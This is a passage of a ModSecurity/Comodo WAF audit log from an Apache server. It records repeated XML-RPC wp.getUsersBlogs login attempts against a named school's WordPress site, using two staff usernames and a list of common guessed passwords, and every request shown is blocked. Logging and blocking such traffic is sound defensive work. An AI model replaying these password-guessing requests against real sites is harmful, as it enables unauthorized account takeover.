"CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073142028248 4977 (- - -) Stopwatch2: 1745073142028248 4977; combined=3826, p1=460, p2=3125, p3=0, p4=0, p5=138, sr=86, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76d89869-Z-- --161a9157-A-- [19/Apr/2025:21:33:25 +0700] aAO0NQ6cTFSgLAHl7PrzHgAAAAc 103.236.140.4 45958 103.236.140.4 8181 --161a9157-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --161a9157-C-- wp.getUsersBlogs wakahumas 555555 --161a9157-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --161a9157-E-- --161a9157-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073205456829 5272 (- - -) Stopwatch2: 1745073205456829 5272; combined=3724, p1=479, p2=3060, p3=0, p4=0, p5=107, sr=90, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --161a9157-Z-- --fe0bd04e-A-- [19/Apr/2025:21:34:30 +0700] aAO0dkruoUXZj665VUEUKgAAAMk 103.236.140.4 52264 103.236.140.4 8181 --fe0bd04e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fe0bd04e-C-- wp.getUsersBlogs wakahumas qwerty1 --fe0bd04e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe0bd04e-E-- --fe0bd04e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073270021300 4765 (- - -) Stopwatch2: 1745073270021300 4765; combined=3449, p1=404, p2=2837, p3=0, p4=0, p5=119, sr=78, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe0bd04e-Z-- --6fe9434b-A-- [19/Apr/2025:21:35:35 +0700] aAO0t-vDiFC_ir7MDwb_kQAAAEg 103.236.140.4 58634 103.236.140.4 8181 --6fe9434b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fe9434b-C-- wp.getUsersBlogs wakahumas 333333 --6fe9434b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fe9434b-E-- --6fe9434b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073335597046 6084 (- - -) Stopwatch2: 1745073335597046 6084; combined=4269, p1=542, p2=3506, p3=0, p4=0, p5=129, sr=94, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fe9434b-Z-- --736e776c-A-- [19/Apr/2025:21:36:39 +0700] aAO09-vDiFC_ir7MDwYBagAAAFY 103.236.140.4 36596 103.236.140.4 8181 --736e776c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --736e776c-C-- wp.getUsersBlogs wakasarpras wakasarpras1 --736e776c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --736e776c-E-- --736e776c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073399515843 4925 (- - -) Stopwatch2: 1745073399515843 4925; combined=3592, p1=389, p2=3023, p3=0, p4=0, p5=103, sr=79, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --736e776c-Z-- --a36ad94a-A-- [19/Apr/2025:21:37:39 +0700] aAO1M-vDiFC_ir7MDwYCvAAAAEQ 103.236.140.4 41866 103.236.140.4 8181 --a36ad94a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a36ad94a-C-- wp.getUsersBlogs wakasarpras 123123123 --a36ad94a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a36ad94a-E-- --a36ad94a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073459468989 5663 (- - -) Stopwatch2: 1745073459468989 5663; combined=4345, p1=527, p2=3476, p3=0, p4=0, p5=185, sr=88, sw=157, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a36ad94a-Z-- --8b518647-A-- [19/Apr/2025:21:38:39 +0700] aAO1b3Na4dA2HllpK_OZugAAAIA 103.236.140.4 47978 103.236.140.4 8181 --8b518647-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8b518647-C-- wp.getUsersBlogs wakasarpras abc123456 --8b518647-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b518647-E-- --8b518647-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073519567944 4880 (- - -) Stopwatch2: 1745073519567944 4880; combined=3777, p1=449, p2=3158, p3=0, p4=0, p5=104, sr=88, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b518647-Z-- --ffb5730d-A-- [19/Apr/2025:21:39:41 +0700] aAO1rUruoUXZj665VUEcKAAAAM8 103.236.140.4 54198 103.236.140.4 8181 --ffb5730d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ffb5730d-C-- wp.getUsersBlogs wakasarpras pass123 --ffb5730d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffb5730d-E-- --ffb5730d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073581668809 4355 (- - -) Stopwatch2: 1745073581668809 4355; combined=3089, p1=365, p2=2558, p3=0, p4=0, p5=95, sr=77, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffb5730d-Z-- --cd776d37-A-- [19/Apr/2025:21:40:47 +0700] aAO17-vDiFC_ir7MDwYHEAAAAE0 103.236.140.4 60792 103.236.140.4 8181 --cd776d37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cd776d37-C-- wp.getUsersBlogs wakasarpras 1111111 --cd776d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd776d37-E-- --cd776d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073647144096 4419 (- - -) Stopwatch2: 1745073647144096 4419; combined=3061, p1=379, p2=2461, p3=0, p4=0, p5=128, sr=69, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd776d37-Z-- --7ea12c10-A-- [19/Apr/2025:21:41:52 +0700] aAO2MEruoUXZj665VUEf8gAAANg 103.236.140.4 39322 103.236.140.4 8181 --7ea12c10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ea12c10-C-- wp.getUsersBlogs wakasarpras 1234abcd --7ea12c10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ea12c10-E-- --7ea12c10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073712959667 4714 (- - -) Stopwatch2: 1745073712959667 4714; combined=3413, p1=392, p2=2827, p3=0, p4=0, p5=110, sr=79, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ea12c10-Z-- --02854a52-A-- [19/Apr/2025:21:43:01 +0700] aAO2dXNa4dA2HllpK_OfbAAAAI0 103.236.140.4 46150 103.236.140.4 8181 --02854a52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --02854a52-C-- wp.getUsersBlogs wakasarpras 123!@# --02854a52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02854a52-E-- --02854a52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073781599558 5248 (- - -) Stopwatch2: 1745073781599558 5248; combined=3796, p1=465, p2=3080, p3=0, p4=0, p5=146, sr=86, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02854a52-Z-- --9f9d1a62-A-- [19/Apr/2025:21:44:04 +0700] aAO2tOvDiFC_ir7MDwYMoAAAAE4 103.236.140.4 52238 103.236.140.4 8181 --9f9d1a62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9f9d1a62-C-- wp.getUsersBlogs wakasarpras 1g2w3e4r --9f9d1a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f9d1a62-E-- --9f9d1a62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073844952605 4696 (- - -) Stopwatch2: 1745073844952605 4696; combined=3552, p1=422, p2=2963, p3=0, p4=0, p5=100, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f9d1a62-Z-- --30561d16-A-- [19/Apr/2025:21:45:04 +0700] aAO28OvDiFC_ir7MDwYN6QAAAFQ 103.236.140.4 58070 103.236.140.4 8181 --30561d16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --30561d16-C-- wp.getUsersBlogs wakasarpras peaches --30561d16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30561d16-E-- --30561d16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073904285610 4158 (- - -) Stopwatch2: 1745073904285610 4158; combined=2791, p1=369, p2=2268, p3=0, p4=0, p5=89, sr=67, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30561d16-Z-- --c1719f63-A-- [19/Apr/2025:21:46:05 +0700] aAO3LQ6cTFSgLAHl7PoFQAAAAAo 103.236.140.4 35990 103.236.140.4 8181 --c1719f63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c1719f63-C-- wp.getUsersBlogs wakasarpras 212121 --c1719f63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1719f63-E-- --c1719f63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073965359744 3880 (- - -) Stopwatch2: 1745073965359744 3880; combined=2894, p1=394, p2=2356, p3=0, p4=0, p5=86, sr=70, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1719f63-Z-- --1bcc0a39-A-- [19/Apr/2025:21:47:06 +0700] aAO3anNa4dA2HllpK_OlNQAAAI8 103.236.140.4 41794 103.236.140.4 8181 --1bcc0a39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1bcc0a39-C-- wp.getUsersBlogs wakasarpras muffin --1bcc0a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bcc0a39-E-- --1bcc0a39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074026072329 5177 (- - -) Stopwatch2: 1745074026072329 5177; combined=3576, p1=470, p2=2938, p3=0, p4=0, p5=100, sr=88, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bcc0a39-Z-- --7bce4c0d-A-- [19/Apr/2025:21:48:06 +0700] aAO3pkruoUXZj665VUEojQAAAMw 103.236.140.4 47496 103.236.140.4 8181 --7bce4c0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7bce4c0d-C-- wp.getUsersBlogs wakasarpras madison1 --7bce4c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bce4c0d-E-- --7bce4c0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074086325193 5499 (- - -) Stopwatch2: 1745074086325193 5499; combined=4142, p1=519, p2=3438, p3=0, p4=0, p5=111, sr=95, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bce4c0d-Z-- --6b9ee41a-A-- [19/Apr/2025:21:49:06 +0700] aAO34kruoUXZj665VUEpggAAAM0 103.236.140.4 52990 103.236.140.4 8181 --6b9ee41a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6b9ee41a-C-- wp.getUsersBlogs wakasarpras marketing2024 --6b9ee41a-F-- 